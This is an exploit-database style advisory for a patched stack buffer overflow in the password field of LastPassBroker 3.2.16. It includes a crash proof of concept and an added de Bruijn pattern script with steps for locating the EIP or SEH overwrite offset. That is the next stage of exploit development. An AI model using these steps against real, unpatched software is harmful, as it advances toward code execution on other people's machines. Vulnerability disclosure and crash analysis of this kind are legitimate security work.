Vendor: LastPassBroker
By: Un_N0n
CVSS: 7.8 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: LastPassBroker
Affected Version From: 3.2.16
Affected Version To: 3.2.16
Patch Exists: YES
Related CWE: N/A
CPE: N/A (software link: https://lastpass.com/download)
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x86(32 BIT)
Date: 9/23/2015

LastPassBroker Stack-based BOF

LastPassBroker.exe 3.2.16 does not bound the data it copies from the password field of its login dialog. Supplying an oversized string there (the published proof of concept pastes 66,666 'A' characters) overwrites a stack buffer and crashes the process. The advisory rates this as potentially leading to arbitrary code execution. Note, however, that the proof of concept only demonstrates the crash, and that it requires a local user to paste the payload into the dialog: until control of the return address or an SEH record is shown, the confirmed impact is a local denial of service.

Mitigation:

The vendor was notified and the issue is fixed in the latest release; update LastPassBroker to a version later than 3.2.16.

Exploit-DB raw data:

'''
********************************************************************************************
# Exploit Title: Last PassBroker Stack-based BOF
# Date: 9/23/2015
# Exploit Author: Un_N0n
# Software Link: https://lastpass.com/download
# Version: 3.2.16
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- Open 'LastPassBroker.exe'.
2- An input box will appear asking for Email and Password;
   in the password field, paste in the contents of crash.txt.
3- Hit Login.
~Software will crash.

[Code to produce crash.txt]: 
'''
# Writes 66666 'A' bytes to crash.txt; paste the file's contents into the password field.
junk = "A" * 66666
with open("crash.txt", "w") as f:
    f.write(junk)
'''
> Vendor Notified, Fixed in latest Release.
**********************************************************************************************
'''
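The proof of concept above only shows that 66,666 'A' bytes crash the process. To assess the "arbitrary code execution" claim, the next step is to learn which part of the input ends up in EIP (or in an overwritten SEH record, which on Windows 7 x86 is often what the crash dialog reflects). The following Python is an added example, not part of the Exploit-DB entry or of LastPass's software: it replaces the 'A' filler with a de Bruijn cyclic pattern in which every 4-byte window is unique, so a register value read from the crash can be mapped back to its offset in the input. The names `cyclic`, `cyclic_find`, `register_to_window` and `write_pattern_file` are this example's own, and no offset for LastPassBroker is claimed; the register value in the usage note is constructed for illustration.

```python
import itertools
import string
import struct

# 62 printable characters; with 4-byte windows there are 62**4 distinct
# windows before anything repeats, comfortably more than the PoC's 66666 bytes.
ALPHABET = string.ascii_lowercase + string.ascii_uppercase + string.digits
CRASH_LEN = 66666  # same length as the published "A" * 66666 proof of concept


def _de_bruijn(alphabet, n):
    """Lazily yield the de Bruijn sequence B(k, n) over `alphabet` (FKM algorithm).

    Within the first k**n symbols every window of n consecutive symbols is
    unique, which is what makes the pattern usable for crash-offset recovery.
    """
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for idx in a[1:p + 1]:
                    yield alphabet[idx]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, alphabet=ALPHABET, n=4):
    """Return the first `length` characters of the cyclic pattern."""
    if length > len(alphabet) ** n:
        raise ValueError("pattern would repeat before reaching the requested length")
    return "".join(itertools.islice(_de_bruijn(alphabet, n), length))


def register_to_window(value):
    """Turn a crash-time 32-bit register value back into the pattern bytes it held.

    x86 is little-endian, so EIP = 0x62616161 was loaded from the bytes 'aaab'.
    """
    return struct.pack("<I", value).decode("latin-1")


def cyclic_find(window, length=CRASH_LEN, alphabet=ALPHABET, n=4):
    """Offset of an n-character window in the first `length` pattern bytes, or -1."""
    if len(window) != n:
        raise ValueError("window must be exactly %d characters" % n)
    return cyclic(length, alphabet, n).find(window)


def windows_are_unique(pattern, n=4):
    """True if no n-character window appears twice (sanity check on the pattern)."""
    seen = set()
    for i in range(len(pattern) - n + 1):
        w = pattern[i:i + n]
        if w in seen:
            return False
        seen.add(w)
    return True


def write_pattern_file(path="crash.txt", length=CRASH_LEN):
    """Drop-in replacement for the PoC's crash.txt; returns the number of bytes written."""
    data = cyclic(length)
    with open(path, "w") as f:
        f.write(data)
    return len(data)


if __name__ == "__main__":
    # Generate the file, then paste it into the password field as in the PoC steps.
    print("wrote %d bytes" % write_pattern_file())
    # Constructed example value: if the debugger showed EIP = 0x62616161,
    # the bytes 'aaab' sit at offset 1 of the pattern.
    print("offset of EIP bytes:", cyclic_find(register_to_window(0x62616161)))
```

Run the script, paste crash.txt into the password field, and read the faulting register from the debugger attached to LastPassBroker.exe. Feeding that value to `cyclic_find(register_to_window(value))` gives the input offset to place a controlled address at; a result of -1 means the register does not hold pattern bytes, in which case check the SEH chain instead of EIP, since a handler overwritten by the same overflow is a different (and on 32-bit Windows often easier) path to controlling execution.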